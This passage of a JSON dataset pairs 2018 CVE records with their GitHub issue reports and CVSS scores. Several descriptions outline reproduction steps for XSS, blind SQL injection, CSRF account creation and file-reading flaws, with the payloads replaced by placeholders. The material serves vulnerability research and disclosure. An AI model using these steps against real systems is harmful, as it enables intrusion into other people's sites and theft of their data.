  17775. "Issue_Url_old": "https://github.com/esigate/esigate/issues/209",
  17776. "Issue_Url_new": "https://github.com/esigate/esigate/issues/209",
  17777. "Repo_new": "esigate/esigate",
  17778. "Issue_Created_At": "2018-10-19T15:31:39Z",
  17779. "description": "Injection in XSLT parser : switch to secure mode. APITAG supports APITAG tag along with the stylesheet attribute. This attribute can be a remote XSLT. This feature can allow an attacker to execute code on the remote server. We have to switch the XSLT parser to secure mode in order to prevent execution of malicious commands inserted in stylesheets. This bug was found by Benoit C\u00f4t\u00e9 Jodoin and reported by Philippe Arteau from APITAG",
  17780. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17781. "severity": "CRITICAL",
  17782. "baseScore": 9.8,
  17783. "impactScore": 5.9,
  17784. "exploitabilityScore": 3.9
  17785. },
  17786. {
  17787. "CVE_ID": "CVE-2018-1000855",
  17788. "Issue_Url_old": "https://github.com/basecamp/easymon/issues/26",
  17789. "Issue_Url_new": "https://github.com/basecamp/easymon/issues/26",
  17790. "Repo_new": "basecamp/easymon",
  17791. "Issue_Created_At": "2018-11-09T12:19:38Z",
  17792. "description": "Possible reflected XSS in Firefox when fetching an invalid check name. When passing an invalid check name to APITAG , an exception is raised, resulting in a NUMBERTAG response with the following body: APITAG Firefox renders that body, and if the name includes any APITAG code via APITAG tags, it'll be executed.",
  17793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17794. "severity": "MEDIUM",
  17795. "baseScore": 6.1,
  17796. "impactScore": 2.7,
  17797. "exploitabilityScore": 2.8
  17798. },
  17799. {
  17800. "CVE_ID": "CVE-2018-1000856",
  17801. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/80",
  17802. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/80",
  17803. "Repo_new": "domainmod/domainmod",
  17804. "Issue_Created_At": "2018-11-20T05:06:31Z",
  17805. "description": "Stored XSS vulnerability in Segment Name . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Poc: Segment Name POST FILETAG Request Body: APITAG FILETAG",
  17806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  17807. "severity": "MEDIUM",
  17808. "baseScore": 4.8,
  17809. "impactScore": 2.7,
  17810. "exploitabilityScore": 1.7
  17811. },
  17812. {
  17813. "CVE_ID": "CVE-2018-1000860",
  17814. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2338",
  17815. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2338",
  17816. "Repo_new": "phpipam/phpipam",
  17817. "Issue_Created_At": "2018-11-29T16:24:40Z",
  17818. "description": "XSS in phpipamredirect cookie. Setting the value of phpipamredirect to APITAG results in XSS when the value is copied to a tag here: CODETAG Proof on demo: FILETAG",
  17819. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17820. "severity": "MEDIUM",
  17821. "baseScore": 4.7,
  17822. "impactScore": 2.7,
  17823. "exploitabilityScore": 1.6
  17824. },
  17825. {
  17826. "CVE_ID": "CVE-2018-1000869",
  17827. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2344",
  17828. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2344",
  17829. "Repo_new": "phpipam/phpipam",
  17830. "Issue_Created_At": "2018-12-03T16:48:07Z",
  17831. "description": "Blind SQL Injection ( PATHTAG ). In parameter object_type in the file PATHTAG at line NUMBERTAG APITAG APITAG CODETAG ERRORTAG",
  17832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17833. "severity": "CRITICAL",
  17834. "baseScore": 9.8,
  17835. "impactScore": 5.9,
  17836. "exploitabilityScore": 3.9
  17837. },
  17838. {
  17839. "CVE_ID": "CVE-2018-1000870",
  17840. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2326",
  17841. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2326",
  17842. "Repo_new": "phpipam/phpipam",
  17843. "Issue_Created_At": "2018-11-21T20:35:58Z",
  17844. "description": "XSS APITAG in PATHTAG (CSRF too: PATHTAG ). APITAG in PATHTAG is vulnerable to XSS. Poc1: Attacker user: Change theme parameter in user settings. APITAG APITAG Victim: View attacker user in admin panel APITAG FILETAG Poc2: PATHTAG is vulnerable to CSRF. An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS vuln. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  17845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17846. "severity": "MEDIUM",
  17847. "baseScore": 5.4,
  17848. "impactScore": 2.7,
  17849. "exploitabilityScore": 2.3
  17850. },
  17851. {
  17852. "CVE_ID": "CVE-2018-1000873",
  17853. "Issue_Url_old": "https://github.com/FasterXML/jackson-modules-java8/issues/90",
  17854. "Issue_Url_new": "https://github.com/fasterxml/jackson-modules-java8/issues/90",
  17855. "Repo_new": "fasterxml/jackson-modules-java8",
  17856. "Issue_Created_At": "2018-10-24T04:28:13Z",
  17857. "description": "Performance issue with malicious APITAG input. (note: moved from URLTAG reported by APITAG It looks the same as: URLTAG Reproduced by the following commit: URLTAG The security bug is in APITAG and APITAG of the APITAG artifact: CODETAG W/A is to use custom serializers for all types that are parsed with APITAG and APITAG by registering them after (or instead of) registration of the APITAG module.",
  17858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17859. "severity": "MEDIUM",
  17860. "baseScore": 6.5,
  17861. "impactScore": 3.6,
  17862. "exploitabilityScore": 2.8
  17863. },
  17864. {
  17865. "CVE_ID": "CVE-2018-1000874",
  17866. "Issue_Url_old": "https://github.com/cebe/markdown/issues/166",
  17867. "Issue_Url_new": "https://github.com/cebe/markdown/issues/166",
  17868. "Repo_new": "cebe/markdown",
  17869. "Issue_Created_At": "2018-12-05T15:18:55Z",
  17870. "description": "Cross site scripting vulnerability. Issue There is a reflected and/or stored xss vulnerability in all of the following parsers: APITAG Markdown APITAG How? The vulnerability occurs when a user crafts a malicious payload and wraps the payload in NUMBERTAG backticks, thus bypassing the parser special character escape. For example: Here is an image of the payloads crafted with single, double, and triple backticks: APITAG And here is an image of the payloads rendered: FILETAG As you can see when the payload is crafted correctly using three backticks, the parser will render it as a script, this can allow malicious individuals to render scripts within a APITAG file on any platform that is using this as the markdown parser. An example of a ran script: FILETAG Impact Doing a quick search on Github for the code that enables your parser: APITAG . I get this many results: FILETAG The vulnerability can be either stored using an APITAG file ( README for example), or reflected if the markdown parser is just parsing the user input text. Malicious attackers can use this method to steal sensitive user data. For example to steal a users cookies: FILETAG This can allow serious impacts on not only the end users using the site, but the reputation of the website as well.",
  17871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17872. "severity": "MEDIUM",
  17873. "baseScore": 6.1,
  17874. "impactScore": 2.7,
  17875. "exploitabilityScore": 2.8
  17876. },
  17877. {
  17878. "CVE_ID": "CVE-2018-1000875",
  17879. "Issue_Url_old": "https://github.com/BOINC/boinc/issues/2907",
  17880. "Issue_Url_new": "https://github.com/boinc/boinc/issues/2907",
  17881. "Repo_new": "boinc/boinc",
  17882. "Issue_Created_At": "2018-12-11T15:25:09Z",
  17883. "description": "BOINC Website Vulnerability. A vulnerability has been identified that will allow any user to create a specially crafted request and obtain the authenticator of any user of the system. This vulnerability was added to the master branch on October NUMBERTAG as part of merge commit APITAG It was fixed in the master branch on December NUMBERTAG th NUMBERTAG as part of merge commit APITAG The vulnerability was also present in server releases NUMBERTAG and NUMBERTAG and is fixed in server release NUMBERTAG see URLTAG It was not present in earlier versioned releases. Projects who updated their website between October NUMBERTAG th NUMBERTAG and December NUMBERTAG th NUMBERTAG are strongly urged to update their website as soon as possible or to implement the workaround described below. Thank you to Juha Sointusalo for identifying the vulnerability and thank you to Shawn Kwang for implementing the fix. How Projects Can Check if Vulnerable: If the file PATHTAG is not present, then you are not vulnerable. If it is present, then run the following command from your project directory: grep logintoken PATHTAG | wc l If it returns NUMBERTAG then your project is vulnerable. If it returns something greater than or equal to NUMBERTAG then your project has the fix. Mitigation: If you are not able to update your website immediately, then you can remove the risk by deleting the file: PATHTAG Since this will break the user consent code, then you need to set APITAG to NUMBERTAG in FILETAG until you are able to update your website. See URLTAG for details about this setting.",
  17884. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17885. "severity": "CRITICAL",
  17886. "baseScore": 9.8,
  17887. "impactScore": 5.9,
  17888. "exploitabilityScore": 3.9
  17889. },
  17890. {
  17891. "CVE_ID": "CVE-2018-1000887",
  17892. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/1",
  17893. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/1",
  17894. "Repo_new": "advisto/peel-shopping",
  17895. "Issue_Created_At": "2018-12-16T15:38:27Z",
  17896. "description": "Stored Cross site Scripting in APITAG parameter. Vulnerability Name: Stored Cross site Scripting in APITAG Name EN \" Parameter Vulnerability Description: An authenticated user can inject malicious javascript code into the APITAG Name EN\" field thus many of the modules are affected by this because the site name is visible in almost of all modules. Vulnerable URL: FILETAG Please saw the APITAG below FILETAG Mitigation: the Entire site is Vulnerable to Cross site scripting attacks input validation should be properly implemented References for Mitigation Vulnerability: URLTAG url",
  17897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  17898. "severity": "MEDIUM",
  17899. "baseScore": 4.8,
  17900. "impactScore": 2.7,
  17901. "exploitabilityScore": 1.7
  17902. },
  17903. {
  17904. "CVE_ID": "CVE-2018-1000890",
  17905. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/37",
  17906. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/37",
  17907. "Repo_new": "frontaccountingerp/fa",
  17908. "Issue_Created_At": "2018-12-19T17:53:24Z",
  17909. "description": "Time Based Blind SQL Injection in APITAG Parameter. Vulnerability Name : Time Based Blind SQL Injection in APITAG Parameter Vulnerability Description: APITAG Parameter in FILETAG file suffer from the Blind SQL Injection, By using the an attacker can grab the Backend Database Information APITAG ERRORTAG Step1: Open the Burp Suite go to the Repeater tab copy the above Contents Step2: Click on the right side penlike icon configure the your ipaddress and port address and click save Step3: Click on \"Go\" Button you will see the response cause the time delay NUMBERTAG seconds. Step4: Change the sleep function value what ever you want and click on \"go\" you will see the time delay what ever you give value to the sleep function. APITAG Video: FILETAG Mitigation: See the OWASP SQL Injection Prevention sheet on this URLTAG link",
  17910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17911. "severity": "HIGH",
  17912. "baseScore": 7.5,
  17913. "impactScore": 3.6,
  17914. "exploitabilityScore": 3.9
  17915. },
  17916. {
  17917. "CVE_ID": "CVE-2018-1002101",
  17918. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/65750",
  17919. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/65750",
  17920. "Repo_new": "kubernetes/kubernetes",
  17921. "Issue_Created_At": "2018-07-03T08:06:15Z",
  17922. "description": "smb mount security issue. APITAG Is this a BUG REPORT or FEATURE REQUEST? : /kind bug > Uncomment only one, leave it on its own line: > > /kind bug > /kind feature What happened : user APITAG Environment Variables to store user input string to prevent command line injection, the env var in APITAG would be taken as literal values and not as executable vulnerable code, this kind of fix is common for command line injection issue (called: parameterized way) What you expected to happen : How to reproduce it (as minimally and precisely as possible) : Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): Cloud provider or hardware configuration: OS (e.g. from /etc/os release): Kernel (e.g. ERRORTAG ): Install tools: Others: /sig windows /sig storage /assign",
  17923. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17924. "severity": "CRITICAL",
  17925. "baseScore": 9.8,
  17926. "impactScore": 5.9,
  17927. "exploitabilityScore": 3.9
  17928. },
  17929. {
  17930. "CVE_ID": "CVE-2018-1002102",
  17931. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85867",
  17932. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85867",
  17933. "Repo_new": "kubernetes/kubernetes",
  17934. "Issue_Created_At": "2019-12-03T22:58:37Z",
  17935. "description": "CVETAG : Unvalidated redirect. CVSS Rating: PATHTAG APITAG URLTAG An attacker controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube apiservers will follow the redirect as a GET request with client cert credentials for authenticating to the Kubelet. Am I vulnerable? Kubernetes API servers with the APITAG feature URLTAG enabled AND without the APITAG feature are affected. API servers using SSH tunnels ( ssh user / ssh keyfile) are not affected. Using the default feature gate values, kube apiserver versions before NUMBERTAG are affected. How do I mitigate this vulnerability? For Kubernetes versions NUMBERTAG the APITAG can be manually enabled with the APITAG flag APITAG . Fix impact The APITAG feature will cause the kube apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built in dockershim & setting the kubelet flag APITAG ), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting APITAG on the kubelet to avoid issues. Fixed Versions Kubernetes NUMBERTAG Fixed by default in URLTAG Kubernetes NUMBERTAG Fix available as alpha in URLTAG Additional Details In a future release, we plan to deprecate the APITAG feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product security /sig api machinery node /area apiserver /close",
  17936. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N",
  17937. "severity": "LOW",
  17938. "baseScore": 2.6,
  17939. "impactScore": 1.4,
  17940. "exploitabilityScore": 1.0
  17941. },
  17942. {
  17943. "CVE_ID": "CVE-2018-1002103",
  17944. "Issue_Url_old": "https://github.com/kubernetes/minikube/issues/3208",
  17945. "Issue_Url_new": "https://github.com/kubernetes/minikube/issues/3208",
  17946. "Repo_new": "kubernetes/minikube",
  17947. "Issue_Created_At": "2018-10-02T21:34:31Z",
  17948. "description": "minikube dashboard host checking.",
  17949. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17950. "severity": "HIGH",
  17951. "baseScore": 8.8,
  17952. "impactScore": 5.9,
  17953. "exploitabilityScore": 2.8
  17954. },
  17955. {
  17956. "CVE_ID": "CVE-2018-1002105",
  17957. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/71411",
  17958. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/71411",
  17959. "Repo_new": "kubernetes/kubernetes",
  17960. "Issue_Created_At": "2018-11-26T11:07:36Z",
  17961. "description": "Proxy connection gets stuck on error response. What happened : When proxying to a backend server, if the server returns an error response, the connection gets stuck. What you expected to happen : The error would be returned and the connection would be closed. /kind bug /kind api machinery /assign",
  17962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17963. "severity": "CRITICAL",
  17964. "baseScore": 9.8,
  17965. "impactScore": 5.9,
  17966. "exploitabilityScore": 3.9
  17967. },
  17968. {
  17969. "CVE_ID": "CVE-2018-1002208",
  17970. "Issue_Url_old": "https://github.com/icsharpcode/SharpZipLib/issues/232",
  17971. "Issue_Url_new": "https://github.com/icsharpcode/sharpziplib/issues/232",
  17972. "Repo_new": "icsharpcode/sharpziplib",
  17973. "Issue_Created_At": "2018-06-11T10:21:47Z",
  17974. "description": "SECURITY: vulnerable to zip slip (possible remote code execution/file overwrite). Background URLTAG Steps to reproduce NUMBERTAG get a malicious zip file, i.e. URLTAG NUMBERTAG unpack with APITAG NUMBERTAG profit Expected behavior either the whole extraction should be stopped, or the files that are being extracted outside of the destination folder should not be extracted. Actual behavior All files are extracted. Version of APITAG All Obtained from (place an x between the brackets for all that apply) [x] Compiled from source branch: all commit: any [x] Downloaded DLL from APITAG [x] Downloaded DLL from APITAG [x] Downloaded DLL from _______ [x] DLL included as part of Package installed using: [x] APITAG [x] APITAG [x] Chocolatey",
  17975. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  17976. "severity": "MEDIUM",
  17977. "baseScore": 5.5,
  17978. "impactScore": 3.6,
  17979. "exploitabilityScore": 1.8
  17980. },
  17981. {
  17982. "CVE_ID": "CVE-2018-10023",
  17983. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/1",
  17984. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/1",
  17985. "Repo_new": "xwlrbh/catfish",
  17986. "Issue_Created_At": "2018-04-11T14:12:58Z",
  17987. "description": "There is storage XSS vulnerability in Comment. Registered user login, comment on the article. POC, APITAG Submit comment to grab packet, use burp modify parameter pinglun= APITAG FILETAG Browse article or administrator login background can trigger",
  17988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17989. "severity": "MEDIUM",
  17990. "baseScore": 5.4,
  17991. "impactScore": 2.7,
  17992. "exploitabilityScore": 2.3
  17993. },
  17994. {
  17995. "CVE_ID": "CVE-2018-10028",
  17996. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/422",
  17997. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/422",
  17998. "Repo_new": "joyplus/joyplus-cms",
  17999. "Issue_Created_At": "2018-04-11T10:13:23Z",
  18000. "description": "Two vulnerabilities. APITAG configuration, installation files do not delete url: URLTAG FILETAG APITAG configuration, log folder can be accessed, and sensitive information leakage will appear, url:url: URLTAG FILETAG FILETAG",
  18001. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  18002. "severity": "MEDIUM",
  18003. "baseScore": 5.3,
  18004. "impactScore": 1.4,
  18005. "exploitabilityScore": 3.9
  18006. },
  18007. {
  18008. "CVE_ID": "CVE-2018-10059",
  18009. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1457",
  18010. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1457",
  18011. "Repo_new": "cacti/cacti",
  18012. "Issue_Created_At": "2018-03-07T21:38:23Z",
  18013. "description": "Path Based Cross Site Scripting (XSS) issues. Running version NUMBERTAG on Windows NUMBERTAG with IIS My company's security scan has picked up NUMBERTAG application vulnerabilities with NUMBERTAG of them being high. Most of these are for Path Based Cross Site Scripting (XSS). I don't see this addressed in any of the newer versions. The list is long but I can leave a few examples. Below are a couple. If this is of any value I can provide more. Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG > Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG '> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG </",
  18014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18015. "severity": "MEDIUM",
  18016. "baseScore": 5.4,
  18017. "impactScore": 2.7,
  18018. "exploitabilityScore": 2.3
  18019. },
  18020. {
  18021. "CVE_ID": "CVE-2018-10073",
  18022. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/423",
  18023. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/423",
  18024. "Repo_new": "joyplus/joyplus-cms",
  18025. "Issue_Created_At": "2018-04-12T07:32:31Z",
  18026. "description": "Another Cross Site Scripting Vulnerability. joyplus cms NUMBERTAG has Another Cross Site Scripting: requests: ERRORTAG ` payload: \"> APITAG // APITAG APITAG APITAG APITAG",
  18027. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18028. "severity": "MEDIUM",
  18029. "baseScore": 4.8,
  18030. "impactScore": 2.7,
  18031. "exploitabilityScore": 1.7
  18032. },
  18033. {
  18034. "CVE_ID": "CVE-2018-10096",
  18035. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/424",
  18036. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/424",
  18037. "Repo_new": "joyplus/joyplus-cms",
  18038. "Issue_Created_At": "2018-04-13T14:38:42Z",
  18039. "description": "joyplus cms NUMBERTAG has Another Cross Site Scripting: requests:. requests: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Then look at the web page, the code is executed FILETAG FILETAG",
  18040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18041. "severity": "MEDIUM",
  18042. "baseScore": 4.8,
  18043. "impactScore": 2.7,
  18044. "exploitabilityScore": 1.7
  18045. },
  18046. {
  18047. "CVE_ID": "CVE-2018-10117",
  18048. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/20",
  18049. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/20",
  18050. "Repo_new": "idreamsoft/iCMS",
  18051. "Issue_Created_At": "2018-04-15T09:29:50Z",
  18052. "description": "CSRF issue that allows attacker to create an account. Hello. I want to report it has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG And account username = hacker is created without admin user's intention.",
  18053. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18054. "severity": "HIGH",
  18055. "baseScore": 8.8,
  18056. "impactScore": 5.9,
  18057. "exploitabilityScore": 2.8
  18058. },
  18059. {
  18060. "CVE_ID": "CVE-2018-10118",
  18061. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/436",
  18062. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/436",
  18063. "Repo_new": "monstra-cms/monstra",
  18064. "Issue_Created_At": "2018-04-15T04:30:21Z",
  18065. "description": "Stored XSS APITAG Authentication). Two Stored XSS reported NUMBERTAG title section) and NUMBERTAG content section) I found another Stored XSS lies in the Name field in the same page ( PATHTAG ) Steps to reproduce: APITAG monstra FILETAG APITAG visit URLTAG APITAG Create New Page button to create a new page APITAG in Name field with payload APITAG APITAG and Exit NUMBERTAG isit the page you just created, then Stored XSS will be triggered Impacts: Anyone who visits the target page will trigger APITAG code execution, including administrator, editor, and guest. Affected Version NUMBERTAG or before Affected URL: FILETAG Testing Environment: Win7 with XAMPP: APITAG \u3001 PHP Version NUMBERTAG Analysis vulnerable page : FILETAG line NUMBERTAG all post data without any sanitization, just add and display Add page and edit page are vulnerable. Mitigation: Filter user input, please refer NUMBERTAG",
  18066. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18067. "severity": "MEDIUM",
  18068. "baseScore": 4.8,
  18069. "impactScore": 2.7,
  18070. "exploitabilityScore": 1.7
  18071. },
  18072. {
  18073. "CVE_ID": "CVE-2018-10121",
  18074. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/437",
  18075. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/437",
  18076. "Repo_new": "monstra-cms/monstra",
  18077. "Issue_Created_At": "2018-04-15T14:03:50Z",
  18078. "description": "ERRORTAG page has Stored XSS Vulnerability. Stored XSS reported NUMBERTAG title section NUMBERTAG content section NUMBERTAG title section) I found another stored XSS in ERRORTAG page (name field), the Vulnerability source in PATHTAG Affected Version NUMBERTAG or before Payload: APITAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Click Edit ERRORTAG page ( URLTAG NUMBERTAG Enter payload in title section and save NUMBERTAG isit FILETAG NUMBERTAG You will trigger Javascript execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment: APITAG + APITAG",
  18079. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18080. "severity": "MEDIUM",
  18081. "baseScore": 4.8,
  18082. "impactScore": 2.7,
  18083. "exploitabilityScore": 1.7
  18084. },
  18085. {
  18086. "CVE_ID": "CVE-2018-10122",
  18087. "Issue_Url_old": "https://github.com/goodrain-apps/chanzhieps/issues/1",
  18088. "Issue_Url_new": "https://github.com/goodrain-apps/chanzhieps/issues/1",
  18089. "Repo_new": "goodrain-apps/chanzhieps",
  18090. "Issue_Created_At": "2018-04-16T01:28:38Z",
  18091. "description": "Front desk arbitrary file reading NUMBERTAG download url FILETAG poc APITAG vul file in APITAG Controllable parameters APITAG ,$pathname ,$extension, Final execution is APITAG while APITAG = APITAG APITAG = APITAG . $pathname; APITAG = APITAG APITAG = APITAG '/') . PATHTAG result APITAG \"r\");",
  18092. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  18093. "severity": "HIGH",
  18094. "baseScore": 7.5,
  18095. "impactScore": 3.6,
  18096. "exploitabilityScore": 3.9
  18097. },
  18098. {
  18099. "CVE_ID": "CVE-2018-10127",
  18100. "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/1",
  18101. "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/1",
  18102. "Repo_new": "gosea/xyhcms",
  18103. "Issue_Created_At": "2018-04-16T07:51:13Z",
  18104. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page will add an administrator role ERRORTAG",
  18105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18106. "severity": "HIGH",
  18107. "baseScore": 8.8,
  18108. "impactScore": 5.9,
  18109. "exploitabilityScore": 2.8
  18110. },
  18111. {
  18112. "CVE_ID": "CVE-2018-10128",
